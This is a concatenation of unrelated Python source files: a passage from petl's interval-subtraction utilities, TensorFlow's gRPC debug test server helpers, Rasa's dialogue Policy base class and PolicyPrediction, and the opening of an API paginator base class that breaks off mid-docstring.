rstart='start', rstop='stop', lkey=None, rkey=None,
include_stop=False):
self.left = left
self.lstart = lstart
self.lstop = lstop
self.lkey = lkey
self.right = right
self.rstart = rstart
self.rstop = rstop
self.rkey = rkey
self.include_stop = include_stop
def __iter__(self):
return iterintervalsubtract(self.left, self.right, self.lstart,
self.lstop, self.rstart, self.rstop,
self.lkey, self.rkey, self.include_stop)
def iterintervalsubtract(left, right, lstart, lstop, rstart, rstop, lkey, rkey,
include_stop):
# create iterators and obtain fields
lit = iter(left)
lhdr = next(lit)
lflds = list(map(text_type, lhdr))
rit = iter(right)
rhdr = next(rit)
# check fields via petl.util.asindices (raises FieldSelectionError if spec
# is not valid)
asindices(lhdr, lstart)
asindices(lhdr, lstop)
if lkey is not None:
asindices(lhdr, lkey)
asindices(rhdr, rstart)
asindices(rhdr, rstop)
if rkey is not None:
asindices(rhdr, rkey)
# determine output fields
outhdr = list(lflds)
yield tuple(outhdr)
# create getters for start and stop positions
lstartidx, lstopidx = asindices(lhdr, (lstart, lstop))
getlcoords = itemgetter(lstartidx, lstopidx)
getrcoords = itemgetter(*asindices(rhdr, (rstart, rstop)))
if rkey is None:
# build interval lookup for right table
lookup = intervallookup(right, rstart, rstop, include_stop=include_stop)
search = lookup.search
# main loop
for lrow in lit:
start, stop = getlcoords(lrow)
rrows = search(start, stop)
if not rrows:
yield tuple(lrow)
else:
rivs = sorted([getrcoords(rrow) for rrow in rrows],
key=itemgetter(0)) # sort by start
for x, y in _subtract(start, stop, rivs):
out = list(lrow)
out[lstartidx] = x
out[lstopidx] = y
yield tuple(out)
else:
# build interval lookup for right table
lookup = facetintervallookup(right, key=rkey, start=rstart, stop=rstop,
include_stop=include_stop)
# getter for facet key values in left table
getlkey = itemgetter(*asindices(lhdr, lkey))
# main loop
for lrow in lit:
lkey = getlkey(lrow)
start, stop = getlcoords(lrow)
try:
rrows = lookup[lkey].search(start, stop)
except KeyError:
rrows = None
except AttributeError:
rrows = None
if not rrows:
yield tuple(lrow)
else:
rivs = sorted([getrcoords(rrow) for rrow in rrows],
key=itemgetter(0)) # sort by start
for x, y in _subtract(start, stop, rivs):
out = list(lrow)
out[lstartidx] = x
out[lstopidx] = y
yield tuple(out)
from collections import namedtuple
_Interval = namedtuple('Interval', 'start stop')
def collapsedintervals(table, start='start', stop='stop', key=None):
"""
Utility function to collapse intervals in a table.
If no facet `key` is given, returns an iterator over `(start, stop)` tuples.
If facet `key` is given, returns an iterator over `(key, start, stop)`
tuples.
"""
if key is None:
table = sort(table, key=start)
for iv in _collapse(values(table, (start, stop))):
yield iv
else:
table = sort(table, key=(key, start))
for k, g in rowgroupby(table, key=key, value=(start, stop)):
for iv in _collapse(g):
yield (k,) + iv
Table.collapsedintervals = collapsedintervals
def _collapse(intervals):
"""
Collapse an iterable of intervals sorted by start coord.
"""
span = None
for start, stop in intervals:
if span is None:
span = _Interval(start, stop)
elif start <= span.stop < stop:
span = _Interval(span.start, stop)
elif start > span.stop:
yield span
span = _Interval(start, stop)
if span is not None:
yield span
def _subtract(start, stop, intervals):
"""
Subtract intervals from a spanning interval.
"""
remainder_start = start
sub_stop = None
for sub_start, sub_stop in _collapse(intervals):
if remainder_start < sub_start:
yield _Interval(remainder_start, sub_start)
remainder_start = sub_stop
if sub_stop is not None and sub_stop < stop:
yield _Interval(sub_stop, stop)
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
def _get_dump_file_path(dump_root, device_name, debug_node_name):
"""Get the file path of the dump file for a debug node.
Args:
dump_root: (str) Root dump directory.
device_name: (str) Name of the device that the debug node resides on.
debug_node_name: (str) Name of the debug node, e.g.,
cross_entropy/Log:0:DebugIdentity.
Returns:
(str) Full path of the dump file.
"""
dump_root = os.path.join(
dump_root, debug_data.device_name_to_device_path(device_name))
if "/" in debug_node_name:
dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name))
dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name))
else:
dump_dir = dump_root
dump_file_name = re.sub(":", "_", debug_node_name)
now_microsec = int(round(time.time() * 1000 * 1000))
dump_file_name += "_%d" % now_microsec
return os.path.join(dump_dir, dump_file_name)
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
def __init__(self, dump_dir, event_listener_servicer):
self._dump_dir = dump_dir
self._event_listener_servicer = event_listener_servicer
if self._dump_dir:
self._try_makedirs(self._dump_dir)
self._grpc_path = None
self._cached_graph_defs = []
self._cached_graph_def_device_names = []
self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
def on_graph_def(self, graph_def, device_name, wall_time):
"""Implementation of the tensor value-carrying Event proto callback.
Args:
graph_def: A GraphDef object.
device_name: Name of the device on which the graph was created.
wall_time: An epoch timestamp (in microseconds) for the graph.
"""
if self._dump_dir:
if self._grpc_path:
self._write_graph_def(graph_def, device_name, wall_time)
else:
self._cached_graph_defs.append(graph_def)
self._cached_graph_def_device_names.append(device_name)
self._cached_graph_def_wall_times.append(wall_time)
else:
self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
debug_data.load_tensor_from_event(event))
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(summary_metadata.plugin_data[0].content)
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
"""An implementation of EventListenerBaseServicer for testing."""
def __init__(self, server_port, dump_dir):
"""Constructor of EventListenerTestServicer.
Args:
server_port: (int) The server port number.
dump_dir: (str) The root directory to which the data files will be
dumped. If empty or None, the received debug data will not be dumped
to the file system: they will be stored in memory instead.
"""
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
grpc_debug_server.EventListenerBaseServicer.__init__(
self, server_port,
functools.partial(EventListenerTestStreamHandler, dump_dir, self))
def clear_data(self):
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
def start_server_on_separate_thread(dump_to_filesystem=True,
server_start_delay_sec=0.0,
poll_server=False):
"""Create a test gRPC debug server and run on a separate thread.
Args:
dump_to_filesystem: (bool) whether the debug server will dump debug data
to the filesystem.
server_start_delay_sec: (float) amount of time (in sec) to delay the server
start up for.
poll_server: (bool) whether the server will be polled till success on
startup.
Returns:
server_port: (int) Port on which the server runs.
debug_server_url: (str) grpc:// URL to the server.
server_dump_dir: (str) The debug server's dump directory.
server_thread: The server Thread object.
server: The `EventListenerTestServicer` object.
Raises:
ValueError: If polling the server process for ready state is not successful
within maximum polling count.
"""
server_port = portpicker.pick_unused_port()
debug_server_url = "grpc://localhost:%d" % server_port
server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
server = EventListenerTestServicer(server_port=server_port,
dump_dir=server_dump_dir)
def delay_then_run_server():
time.sleep(server_start_delay_sec)
server.run_server()
server_thread = threading.Thread(target=delay_then_run_server)
server_thread.start()
if poll_server:
if not _poll_server_till_success(
50,
0.2,
debug_server_url,
server_dump_dir,
server,
gpu_memory_fraction=0.1):
raise ValueError(
"Failed to start test gRPC debug server at port %d" % server_port)
server.clear_data()
return server_port, debug_server_url, server_dump_dir, server_thread, server
def _poll_server_till_success(max_attempts,
sleep_per_poll_sec,
debug_server_url,
dump_dir,
server,
gpu_memory_fraction=1.0):
"""Poll server until success or exceeding max polling count.
Args:
max_attempts: (int) How many times to poll at maximum
sleep_per_poll_sec: (float) How many seconds to sleep for after each
unsuccessful poll.
debug_server_url: (str) gRPC URL to the debug server.
dump_dir: (str) Dump directory to look for files in. If None, will directly
check data from the server object.
server: The server object.
gpu_memory_fraction: (float) Fraction of GPU memory to be
allocated for the Session used in server polling.
Returns:
(bool) Whether the polling succeeded within max_polls attempts.
"""
poll_count = 0
config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
per_process_gpu_memory_fraction=gpu_memory_fraction))
with session.Session(config=config) as sess:
for poll_count in range(max_attempts):
server.clear_data()
print("Polling: poll_count = %d" % poll_count)
x_init_name = "x_init_%d" % poll_count
x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
x = variables.Variable(x_init, name=x_init_name)
run_options = config_pb2.RunOptions()
debug_utils.add_debug_tensor_watch(
run_options, x_init_name, 0, debug_urls=[debug_server_url])
try:
sess.run(x.initializer, options=run_options)
except errors.FailedPreconditionError:
pass
if dump_dir:
if os.path.isdir(
dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
shutil.rmtree(dump_dir)
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
else:
if server.debug_tensor_values:
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
return False
| |
from __future__ import annotations
import abc
import copy
import logging
from enum import Enum
from pathlib import Path
from rasa.shared.core.events import Event
from typing import (
Any,
List,
Optional,
Text,
Dict,
Callable,
Union,
Tuple,
TYPE_CHECKING,
)
import numpy as np
from rasa.engine.graph import GraphComponent, ExecutionContext
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.core.featurizers.precomputation import MessageContainerForCoreFeaturization
from rasa.core.featurizers.tracker_featurizers import TrackerFeaturizer
from rasa.core.featurizers.tracker_featurizers import MaxHistoryTrackerFeaturizer
from rasa.core.featurizers.single_state_featurizer import SingleStateFeaturizer
from rasa.core.featurizers.tracker_featurizers import FEATURIZER_FILE
import rasa.utils.common
import rasa.shared.utils.io
from rasa.shared.exceptions import RasaException, FileIOException
from rasa.shared.nlu.constants import ENTITIES, INTENT, TEXT, ACTION_TEXT, ACTION_NAME
from rasa.shared.core.domain import Domain, State
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.core.generator import TrackerWithCachedStates
from rasa.core.constants import (
DEFAULT_POLICY_PRIORITY,
POLICY_PRIORITY,
POLICY_MAX_HISTORY,
)
from rasa.shared.core.constants import (
USER,
SLOTS,
PREVIOUS_ACTION,
ACTIVE_LOOP,
)
import rasa.shared.utils.common
if TYPE_CHECKING:
from rasa.shared.nlu.training_data.features import Features
logger = logging.getLogger(__name__)
class SupportedData(Enum):
"""Enumeration of a policy's supported training data type."""
# policy only supports ML-based training data ("stories")
ML_DATA = 1
# policy only supports rule-based data ("rules")
RULE_DATA = 2
# policy supports both ML-based and rule-based data ("stories" as well as "rules")
ML_AND_RULE_DATA = 3
@staticmethod
def trackers_for_supported_data(
supported_data: SupportedData,
trackers: Union[List[DialogueStateTracker], List[TrackerWithCachedStates]],
) -> Union[List[DialogueStateTracker], List[TrackerWithCachedStates]]:
"""Return trackers for a given policy.
Args:
supported_data: Supported data filter for the `trackers`.
trackers: Trackers to split.
Returns:
Trackers from ML-based training data and/or rule-based data.
"""
if supported_data == SupportedData.RULE_DATA:
return [tracker for tracker in trackers if tracker.is_rule_tracker]
if supported_data == SupportedData.ML_DATA:
return [tracker for tracker in trackers if not tracker.is_rule_tracker]
# `supported_data` is `SupportedData.ML_AND_RULE_DATA`
return trackers
class Policy(GraphComponent):
"""Common parent class for all dialogue policies."""
@staticmethod
def supported_data() -> SupportedData:
"""The type of data supported by this policy.
By default, this is only ML-based training data. If policies support rule data,
or both ML-based data and rule data, they need to override this method.
Returns:
The data type supported by this policy (ML-based training data).
"""
return SupportedData.ML_DATA
def __init__(
self,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
featurizer: Optional[TrackerFeaturizer] = None,
) -> None:
"""Constructs a new Policy object."""
self.config = config
if featurizer is None:
featurizer = self._create_featurizer()
self.__featurizer = featurizer
self.priority = config.get(POLICY_PRIORITY, DEFAULT_POLICY_PRIORITY)
self.finetune_mode = execution_context.is_finetuning
self._model_storage = model_storage
self._resource = resource
@classmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
**kwargs: Any,
) -> Policy:
"""Creates a new untrained policy (see parent class for full docstring)."""
return cls(config, model_storage, resource, execution_context)
def _create_featurizer(self) -> TrackerFeaturizer:
policy_config = copy.deepcopy(self.config)
featurizer_configs = policy_config.get("featurizer")
if not featurizer_configs:
return self._standard_featurizer()
featurizer_func = _get_featurizer_from_config(
featurizer_configs,
self.__class__.__name__,
lookup_path="rasa.core.featurizers.tracker_featurizers",
)
featurizer_config = featurizer_configs[0]
state_featurizer_configs = featurizer_config.pop("state_featurizer", None)
if state_featurizer_configs:
state_featurizer_func = _get_featurizer_from_config(
state_featurizer_configs,
self.__class__.__name__,
lookup_path="rasa.core.featurizers.single_state_featurizer",
)
state_featurizer_config = state_featurizer_configs[0]
featurizer_config["state_featurizer"] = state_featurizer_func(
**state_featurizer_config
)
featurizer = featurizer_func(**featurizer_config)
if (
isinstance(featurizer, MaxHistoryTrackerFeaturizer)
and POLICY_MAX_HISTORY in policy_config
and POLICY_MAX_HISTORY not in featurizer_config
):
featurizer.max_history = policy_config[POLICY_MAX_HISTORY]
return featurizer
def _standard_featurizer(self) -> MaxHistoryTrackerFeaturizer:
"""Initializes the standard featurizer for this policy."""
return MaxHistoryTrackerFeaturizer(
SingleStateFeaturizer(), self.config.get(POLICY_MAX_HISTORY)
)
@property
def featurizer(self) -> TrackerFeaturizer:
"""Returns the policy's featurizer."""
return self.__featurizer
@staticmethod
def _get_valid_params(func: Callable, **kwargs: Any) -> Dict:
"""Filters out kwargs that cannot be passed to func.
Args:
func: a callable function
Returns:
the dictionary of parameters
"""
valid_keys = rasa.shared.utils.common.arguments_of(func)
params = {key: kwargs.get(key) for key in valid_keys if kwargs.get(key)}
ignored_params = {
key: kwargs.get(key) for key in kwargs.keys() if not params.get(key)
}
logger.debug(f"Parameters ignored by `model.fit(...)`: {ignored_params}")
return params
def _featurize_for_training(
self,
training_trackers: List[DialogueStateTracker],
domain: Domain,
precomputations: Optional[MessageContainerForCoreFeaturization],
bilou_tagging: bool = False,
**kwargs: Any,
) -> Tuple[
List[List[Dict[Text, List[Features]]]],
np.ndarray,
List[List[Dict[Text, List[Features]]]],
]:
"""Transform training trackers into a vector representation.
The trackers, consisting of multiple turns, will be transformed
into a float vector which can be used by a ML model.
Args:
training_trackers:
the list of the :class:`rasa.core.trackers.DialogueStateTracker`
domain: the :class:`rasa.shared.core.domain.Domain`
precomputations: Contains precomputed features and attributes.
bilou_tagging: indicates whether BILOU tagging should be used or not
Returns:
- a dictionary of attribute (INTENT, TEXT, ACTION_NAME, ACTION_TEXT,
ENTITIES, SLOTS, FORM) to a list of features for all dialogue turns in
all training trackers
- the label ids (e.g. action ids) for every dialogue turn in all training
trackers
- A dictionary of entity type (ENTITY_TAGS) to a list of features
containing entity tag ids for text user inputs otherwise empty dict
for all dialogue turns in all training trackers
"""
state_features, label_ids, entity_tags = self.featurizer.featurize_trackers(
training_trackers,
domain,
precomputations=precomputations,
bilou_tagging=bilou_tagging,
ignore_action_unlikely_intent=self.supported_data()
== SupportedData.ML_DATA,
)
max_training_samples = kwargs.get("max_training_samples")
if max_training_samples is not None:
logger.debug(
"Limit training data to {} training samples."
"".format(max_training_samples)
)
state_features = state_features[:max_training_samples]
label_ids = label_ids[:max_training_samples]
entity_tags = entity_tags[:max_training_samples]
return state_features, label_ids, entity_tags
def _prediction_states(
self,
tracker: DialogueStateTracker,
domain: Domain,
use_text_for_last_user_input: bool = False,
rule_only_data: Optional[Dict[Text, Any]] = None,
) -> List[State]:
"""Transforms tracker to states for prediction.
Args:
tracker: The tracker to be featurized.
domain: The Domain.
use_text_for_last_user_input: Indicates whether to use text or intent label
for featurizing last user input.
rule_only_data: Slots and loops which are specific to rules and hence
should be ignored by this policy.
Returns:
A list of states.
"""
return self.featurizer.prediction_states(
[tracker],
domain,
use_text_for_last_user_input=use_text_for_last_user_input,
ignore_rule_only_turns=self.supported_data() == SupportedData.ML_DATA,
rule_only_data=rule_only_data,
ignore_action_unlikely_intent=self.supported_data()
== SupportedData.ML_DATA,
)[0]
def _featurize_for_prediction(
self,
tracker: DialogueStateTracker,
domain: Domain,
precomputations: Optional[MessageContainerForCoreFeaturization],
rule_only_data: Optional[Dict[Text, Any]],
use_text_for_last_user_input: bool = False,
) -> List[List[Dict[Text, List[Features]]]]:
"""Transforms training tracker into a vector representation.
The trackers, consisting of multiple turns, will be transformed
into a float vector which can be used by a ML model.
Args:
tracker: The tracker to be featurized.
domain: The Domain.
precomputations: Contains precomputed features and attributes.
use_text_for_last_user_input: Indicates whether to use text or intent label
for featurizing last user input.
rule_only_data: Slots and loops which are specific to rules and hence
should be ignored by this policy.
Returns:
A list (corresponds to the list of trackers)
of lists (corresponds to all dialogue turns)
of dictionaries of state type (INTENT, TEXT, ACTION_NAME, ACTION_TEXT,
ENTITIES, SLOTS, ACTIVE_LOOP) to a list of features for all dialogue
turns in all trackers.
"""
return self.featurizer.create_state_features(
[tracker],
domain,
precomputations=precomputations,
use_text_for_last_user_input=use_text_for_last_user_input,
ignore_rule_only_turns=self.supported_data() == SupportedData.ML_DATA,
rule_only_data=rule_only_data,
ignore_action_unlikely_intent=self.supported_data()
== SupportedData.ML_DATA,
)
@abc.abstractmethod
def train(
self,
training_trackers: List[TrackerWithCachedStates],
domain: Domain,
**kwargs: Any,
) -> Resource:
"""Trains a policy.
Args:
training_trackers: The story and rules trackers from the training data.
domain: The model's domain.
**kwargs: Depending on the specified `needs` section and the resulting
graph structure the policy can use different input to train itself.
Returns:
A policy must return its resource locator so that potential children nodes
can load the policy from the resource.
"""
raise NotImplementedError("Policy must have the capacity to train.")
@abc.abstractmethod
def predict_action_probabilities(
self,
tracker: DialogueStateTracker,
domain: Domain,
rule_only_data: Optional[Dict[Text, Any]] = None,
**kwargs: Any,
) -> PolicyPrediction:
"""Predicts the next action the bot should take after seeing the tracker.
Args:
tracker: The tracker containing the conversation history up to now.
domain: The model's domain.
rule_only_data: Slots and loops which are specific to rules and hence
should be ignored by this policy.
**kwargs: Depending on the specified `needs` section and the resulting
graph structure the policy can use different input to make predictions.
Returns:
The prediction.
"""
raise NotImplementedError("Policy must have the capacity to predict.")
def _prediction(
self,
probabilities: List[float],
events: Optional[List[Event]] = None,
optional_events: Optional[List[Event]] = None,
is_end_to_end_prediction: bool = False,
is_no_user_prediction: bool = False,
diagnostic_data: Optional[Dict[Text, Any]] = None,
action_metadata: Optional[Dict[Text, Any]] = None,
) -> PolicyPrediction:
return PolicyPrediction(
probabilities,
self.__class__.__name__,
self.priority,
events,
optional_events,
is_end_to_end_prediction,
is_no_user_prediction,
diagnostic_data,
action_metadata=action_metadata,
)
@classmethod
def load(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
**kwargs: Any,
) -> Policy:
"""Loads a trained policy (see parent class for full docstring)."""
featurizer = None
try:
with model_storage.read_from(resource) as path:
if (Path(path) / FEATURIZER_FILE).is_file():
featurizer = TrackerFeaturizer.load(path)
config.update(kwargs)
except (ValueError, FileNotFoundError, FileIOException):
logger.debug(
f"Couldn't load metadata for policy '{cls.__name__}' as the persisted "
f"metadata couldn't be loaded."
)
return cls(
config, model_storage, resource, execution_context, featurizer=featurizer,
)
def _default_predictions(self, domain: Domain) -> List[float]:
"""Creates a list of zeros.
Args:
domain: the :class:`rasa.shared.core.domain.Domain`
Returns:
the list of the length of the number of actions
"""
return [0.0] * domain.num_actions
@staticmethod
def format_tracker_states(states: List[Dict]) -> Text:
"""Format tracker states to human readable format on debug log.
Args:
states: list of tracker states dicts
Returns:
the string of the states with user intents and actions
"""
# empty string to insert line break before first state
formatted_states = [""]
if states:
for index, state in enumerate(states):
state_messages = []
if state:
if USER in state:
if TEXT in state[USER]:
state_messages.append(
f"user text: {str(state[USER][TEXT])}"
)
if INTENT in state[USER]:
state_messages.append(
f"user intent: {str(state[USER][INTENT])}"
)
if ENTITIES in state[USER]:
state_messages.append(
f"user entities: {str(state[USER][ENTITIES])}"
)
if PREVIOUS_ACTION in state:
if ACTION_NAME in state[PREVIOUS_ACTION]:
state_messages.append(
f"previous action name: "
f"{str(state[PREVIOUS_ACTION][ACTION_NAME])}"
)
if ACTION_TEXT in state[PREVIOUS_ACTION]:
state_messages.append(
f"previous action text: "
f"{str(state[PREVIOUS_ACTION][ACTION_TEXT])}"
)
if ACTIVE_LOOP in state:
state_messages.append(f"active loop: {str(state[ACTIVE_LOOP])}")
if SLOTS in state:
state_messages.append(f"slots: {str(state[SLOTS])}")
state_message_formatted = " | ".join(state_messages)
state_formatted = f"[state {str(index)}] {state_message_formatted}"
formatted_states.append(state_formatted)
return "\n".join(formatted_states)
def __repr__(self) -> Text:
"""Returns text representation of object."""
return f"{self.__class__.__name__}@{id(self)}"
class PolicyPrediction:
"""Stores information about the prediction of a `Policy`."""
def __init__(
self,
probabilities: List[float],
policy_name: Optional[Text],
policy_priority: int = 1,
events: Optional[List[Event]] = None,
optional_events: Optional[List[Event]] = None,
is_end_to_end_prediction: bool = False,
is_no_user_prediction: bool = False,
diagnostic_data: Optional[Dict[Text, Any]] = None,
hide_rule_turn: bool = False,
action_metadata: Optional[Dict[Text, Any]] = None,
) -> None:
"""Creates a `PolicyPrediction`.
Args:
probabilities: The probabilities for each action.
policy_name: Name of the policy which made the prediction.
policy_priority: The priority of the policy which made the prediction.
events: Events which the `Policy` needs to have applied to the tracker
after the prediction. These events are applied independent of whether
the policy wins against other policies or not. Be careful which events
you return as they can potentially influence the conversation flow.
optional_events: Events which the `Policy` needs to have applied to the
tracker after the prediction in case it wins. These events are only
applied in case the policy's prediction wins. Be careful which events
you return as they can potentially influence the conversation flow.
is_end_to_end_prediction: `True` if the prediction used the text of the
user message instead of the intent.
is_no_user_prediction: `True` if the prediction uses neither the text
of the user message nor the intent. This is for the example the case
for happy loop paths.
diagnostic_data: Intermediate results or other information that is not
necessary for Rasa to function, but intended for debugging and
fine-tuning purposes.
hide_rule_turn: `True` if the prediction was made by the rules which
do not appear in the stories
action_metadata: Specifies additional metadata that can be passed
by policies.
"""
self.probabilities = probabilities
self.policy_name = policy_name
self.policy_priority = (policy_priority,)
self.events = events or []
self.optional_events = optional_events or []
self.is_end_to_end_prediction = is_end_to_end_prediction
self.is_no_user_prediction = is_no_user_prediction
self.diagnostic_data = diagnostic_data or {}
self.hide_rule_turn = hide_rule_turn
self.action_metadata = action_metadata
@staticmethod
def for_action_name(
domain: Domain,
action_name: Text,
policy_name: Optional[Text] = None,
confidence: float = 1.0,
action_metadata: Optional[Dict[Text, Any]] = None,
) -> "PolicyPrediction":
"""Create a prediction for a given action.
Args:
domain: The current model domain
action_name: The action which should be predicted.
policy_name: The policy which did the prediction.
confidence: The prediction confidence.
action_metadata: Additional metadata to be attached with the prediction.
Returns:
The prediction.
"""
probabilities = confidence_scores_for(action_name, confidence, domain)
return PolicyPrediction(
probabilities, policy_name, action_metadata=action_metadata
)
def __eq__(self, other: Any) -> bool:
"""Checks if the two objects are equal.
Args:
other: Any other object.
Returns:
`True` if other has the same type and the values are the same.
"""
if not isinstance(other, PolicyPrediction):
return False
return (
self.probabilities == other.probabilities
and self.policy_name == other.policy_name
and self.policy_priority == other.policy_priority
and self.events == other.events
and self.optional_events == other.optional_events
and self.is_end_to_end_prediction == other.is_end_to_end_prediction
and self.is_no_user_prediction == other.is_no_user_prediction
and self.hide_rule_turn == other.hide_rule_turn
and self.action_metadata == other.action_metadata
# We do not compare `diagnostic_data`, because it has no effect on the
# action prediction.
)
@property
def max_confidence_index(self) -> int:
"""Gets the index of the action prediction with the highest confidence.
Returns:
The index of the action with the highest confidence.
"""
return self.probabilities.index(self.max_confidence)
@property
def max_confidence(self) -> float:
"""Gets the highest predicted confidence.
Returns:
The highest predicted confidence.
"""
return max(self.probabilities, default=0.0)
def confidence_scores_for(
action_name: Text, value: float, domain: Domain
) -> List[float]:
"""Returns confidence scores if a single action is predicted.
Args:
action_name: the name of the action for which the score should be set
value: the confidence for `action_name`
domain: the :class:`rasa.shared.core.domain.Domain`
Returns:
the list of the length of the number of actions
"""
results = [0.0] * domain.num_actions
idx = domain.index_for_action(action_name)
results[idx] = value
return results
class InvalidPolicyConfig(RasaException):
"""Exception that can be raised when policy config is not valid."""
def _get_featurizer_from_config(
config: List[Dict[Text, Any]], policy_name: Text, lookup_path: Text
) -> Callable[..., TrackerFeaturizer]:
"""Gets the featurizer initializer and its arguments from a policy config."""
# Only 1 featurizer is allowed
if len(config) > 1:
featurizer_names = [
featurizer_config.get("name") for featurizer_config in config
]
raise InvalidPolicyConfig(
f"Every policy can only have 1 featurizer but '{policy_name}' "
f"uses {len(config)} featurizers ('{', '.join(featurizer_names)}')."
)
featurizer_config = config[0]
featurizer_name = featurizer_config.pop("name")
featurizer_func = rasa.shared.utils.common.class_from_module_path(
featurizer_name, lookup_path=lookup_path
)
return featurizer_func
| |
"""Paginators for iterating over API results."""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit
class InvalidPageError(Exception):
"""An error representing an invalid page access."""
class BasePaginator(object):
"""Base class for a paginator used in the hosting services code.
This provides the basic state and stubbed functions for a simple
paginator. Subclasses can build upon this to offer more advanced
functionality.
Attributes:
page_data (object):
The data for the current page. This is implementation-dependent,
but will usually be a list.
per_page (int):
The number of items to fetch per page.
request_kwargs (dict):
Keyword arguments to pass when making HTTP requests.
start (int):
The starting page. Whether this is 0-based or 1-based depends
on the hosting service.
total_count (int):
The total number of results across all pages. This will be ``None``
if the value isn't known.
"""
def __init__(self, start=None, per_page=None, request_kwargs=None):
"""Initialize the paginator.
Args:
start (int, optional):
The starting page. Whether this is 0-based or 1-based depends
on the hosting service.
per_page (int, optional):
The number of items per page.
request_kwargs (dict, optional):
Keyword arguments to pass when making a request.
"""
self.start = start
self.per_page = per_page
self.page_data = None
self.total_count = None
self.request_kwargs = request_kwargs or {}
@property
def has_prev(self):
"""Whether there's a previous page available.
Subclasses must override this to provide a meaningful value.
"""
raise NotImplementedError
@property
def has_next(self):
"""Whether there's a next page available.
Subclasses must override this to provide a meaningful value.
"""
raise NotImplementedError
def prev(self):
"""Fetch the previous page, returning the page data.
Subclasses must override this to provide the logic for fetching pages.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no previous page to fetch.
"""
raise NotImplementedError
def next(self):
"""Fetch the next page, returning the page data.
Subclasses must override this to provide the logic for fetching pages.
Returns:
object:
